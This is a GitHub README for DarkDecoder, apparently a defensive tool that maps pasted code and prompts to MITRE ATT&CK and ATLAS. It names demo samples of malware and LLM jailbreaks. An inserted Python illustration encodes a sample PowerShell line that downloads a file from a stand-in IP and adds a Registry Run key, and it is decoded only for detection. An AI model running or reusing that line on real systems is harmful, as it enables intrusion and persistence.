Pyhroff/darkdecoder

💀 DarkDecoder

Dual-Framework Cyber Threat Intelligence Platform

Paste suspicious code or AI inputs. Get instant threat intelligence mapped to MITRE ATT&CK and MITRE ATLAS in under 20 seconds.



What Is DarkDecoder?

DarkDecoder is the only free tool that combines two official cyber threat frameworks, MITRE ATT&CK for traditional malware and MITRE ATLAS for AI/ML adversarial threats, in a single platform.

Security analysts waste hours manually cross-referencing malicious code against threat databases. DarkDecoder does it in 20 seconds: paste code or a suspicious prompt and get a full breakdown: danger score, technique mappings, IOCs, kill chain, remediation steps, and exportable reports.

MITRE ATLAS coverage: 40+ techniques across 13 tactics, including all LLM-specific techniques (prompt injection, jailbreak, meta-prompt extraction, plugin compromise, LLM data leakage).


Three Analysis Modules

Module 1: Malware Scanner (MITRE ATT&CK)

  • Deobfuscates base64, hex, eval chains, string concatenation
  • Classifies malware type: Ransomware, Keylogger, Reverse Shell, Cryptominer, Webshell, and more
  • Danger score 1–10 with full justification
  • Maps to MITRE ATT&CK T-codes (T1059, T1547, T1486, etc.)
  • Extracts IOCs: IPs, domains, URLs, file paths, registry keys, mutexes
  • Plain English summary for non-technical stakeholders
  • Actionable remediation steps

Module 2: AI Threat Analyzer (MITRE ATLAS v4)

  • 40+ ATLAS techniques across all 13 tactics: Reconnaissance, Resource Development, Initial Access, ML Model Access, Execution, Persistence, ML Attack Staging, Defense Evasion, Discovery, Collection, Exfiltration, and Impact
  • Detects LLM-specific attacks: prompt injection (AML.T0051), jailbreak (AML.T0054), meta-prompt extraction (AML.T0058), plugin compromise (AML.T0057), LLM data leakage (AML.T0056)
  • Flags training data poisoning, backdoor insertion, model extraction, membership inference
  • Identifies ML supply chain attacks and surrogate model construction
  • Dual-Framework mode: run both ATLAS + ATT&CK on the same input when code targets ML infrastructure

Module 3: Red Team Intel (ATT&CK Kill Chain)

  • Full 10-phase ATT&CK kill chain visualization
  • Weaponization score + stealth rating (1–10)
  • Privilege escalation level: None → Local → Admin → Domain Admin → SYSTEM/Root
  • Detection difficulty rating + CVSS vector string generation
  • Named APT group / threat actor similarity matching
  • Full attack narrative from an adversary perspective

Features

| Feature | Details |
|---|---|
| File Upload | .py .js .php .ps1 .sh .bat .rb .go .cs .vbs (up to 200 MB) |
| Report Export | PDF · JSON · TXT, one click, all modules |
| Attack Timeline | Step-by-step progression with MITRE technique IDs |
| Session History | All scans logged with timestamps in sidebar |
| Hash Analysis | SHA256 + MD5 computed on every submission |
| Built-in Samples | Pre-loaded demo payloads including GCG suffix + Crescendo escalation |
| Zero Cost | Runs entirely on Groq's free tier, no credit card |
| ATLAS Depth | 40+ techniques, 13 tactics, tactic name shown per technique |
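To make concrete what Module 1 and the Hash Analysis feature describe (hash every submission, peel a base64 layer, pull IOCs, map indicators to the T-codes named above), here is an added, self-contained Python illustration. It is not the project's analyzer.py; the sample line, the regexes and the indicator-to-technique hints are assumptions made for the example.

```python
import base64
import hashlib
import re

# Constructed sample, not taken from the project: a launcher line whose real
# payload sits behind a base64 layer, the pattern Module 1 unwraps first.
INNER = (b"iwr http://203.0.113.7/stage.txt; "
         b"reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v upd")
SAMPLE = "powershell -enc " + base64.b64encode(INNER).decode()

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
IOC_PATTERNS = {
    "url": re.compile(r"https?://[^\s;'\"]+"),
    "ip": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "registry": re.compile(r"HK(?:LM|CU)\\[\w\\]+"),
}
# Assumed indicator -> technique hints, limited to T-codes the README names.
TECHNIQUE_HINTS = {
    "powershell": "T1059",           # Command and Scripting Interpreter
    "currentversion\\run": "T1547",  # Boot or Logon Autostart Execution
}

def hashes(submission: str) -> dict:
    # SHA256 + MD5 of the raw submission, as the Hash Analysis feature does
    data = submission.encode()
    return {"sha256": hashlib.sha256(data).hexdigest(),
            "md5": hashlib.md5(data).hexdigest()}

def deobfuscate(text: str, depth: int = 3) -> list:
    """Return the text plus every readable base64 layer nested inside it."""
    layers = [text]
    if depth == 0:
        return layers
    for token in B64_TOKEN.findall(text):
        try:
            raw = base64.b64decode(token, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if raw and all(32 <= b < 127 for b in raw):  # keep only printable layers
            layers += deobfuscate(raw.decode("ascii"), depth - 1)
    return layers

def extract_iocs(layers: list) -> dict:
    joined = "\n".join(layers)
    return {k: sorted(set(p.findall(joined))) for k, p in IOC_PATTERNS.items()}

def map_techniques(layers: list) -> list:
    joined = "\n".join(layers).lower()
    return sorted({t for hint, t in TECHNIQUE_HINTS.items() if hint in joined})

def analyze(submission: str) -> dict:
    layers = deobfuscate(submission)
    return {"hashes": hashes(submission), "layers": len(layers),
            "iocs": extract_iocs(layers), "techniques": map_techniques(layers)}
```

Running `analyze(SAMPLE)` finds the IP, URL and Run-key IOCs only after the base64 layer is peeled, which is why hashing the raw submission and deobfuscating it are separate steps.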

Tech Stack

| Component | Technology |
|---|---|
| AI Engine | Groq API (Llama 3.3 70B Versatile) |
| Threat Framework 1 | MITRE ATT&CK v14 |
| Threat Framework 2 | MITRE ATLAS v4 (AI/ML adversarial threats) |
| Backend | Python 3.10+ |
| Frontend | Streamlit |
| PDF Generation | fpdf2 |
| Environment | python-dotenv |

Quick Start

```bash
# 1. Clone
git clone https://github.com/Pyhroff/darkdecoder
cd darkdecoder

# 2. Install dependencies
pip install -r requirements.txt

# 3. Add your free Groq API key
cp .env.example .env
# Open .env and set: GROQ_API_KEY=your_key_here

# 4. Run
streamlit run app.py
```

Get a free Groq API key at console.groq.com: no credit card, 14,400 requests/day on the free tier.


Built-in Demo Samples

| Module | Sample Payloads |
|---|---|
| Malware Scanner | PowerShell Dropper · Python Reverse Shell · JS Cryptominer · PHP Webshell · Ransomware Stub |
| AI Threat Analyzer | Prompt Injection · Data Poisoning · Model Extraction · Jailbreak · GCG Adversarial Suffix · Crescendo Escalation |
| Red Team Intel | Privilege Escalation · Lateral Movement · Defense Evasion · C2 Beacon |

Why DarkDecoder?

| | DarkDecoder | VirusTotal | Traditional SIEMs |
|---|---|---|---|
| MITRE ATT&CK mapping | ✅ | Partial | ✅ (paid) |
| MITRE ATLAS (AI threats) | ✅ 40+ techniques | ❌ | ❌ |
| Red team kill chain | ✅ | ❌ | ❌ |
| LLM-specific attacks | ✅ | ❌ | ❌ |
| Free tier | ✅ | ✅ | ❌ |
| Self-hostable | ✅ | ❌ | ❌ |

Project Structure

```text
darkdecoder/
├── app.py                 # Main Streamlit UI (3 modules + dual-framework mode)
├── analyzer.py            # MITRE ATT&CK malware scanner
├── ai_analyzer.py         # MITRE ATLAS v4 AI threat detector (40+ techniques)
├── redteam_analyzer.py    # Red team kill chain analyzer
├── report_generator.py    # PDF report generation
├── requirements.txt
├── .env.example
└── .gitignore
```

Security Portfolio

DarkDecoder is part of a three-project AI security portfolio:

| Project | Role | Frameworks |
|---|---|---|
| DarkDecoder | Threat intelligence: what is the attack? | MITRE ATT&CK + ATLAS |
| PromptStrike | Active red teaming: can you jailbreak it? | PAIR · TAP · Crescendo · GCG |
| SOC PARALLAX | Behavioral defense: detect the attacker | Neo4j · LangGraph · Ollama |

License

MIT License: free to use, modify, and deploy.


DarkDecoder. Because malware doesn't explain itself.

About

πŸ›‘οΈ Dual-framework cyber threat-intel platform β€” paste suspicious code, get AI-powered MITRE ATT&CK + ATLAS analysis, IOCs, and a red-team kill chain in under 20s. Python Β· Streamlit Β· Groq Llama 3.3 70B.
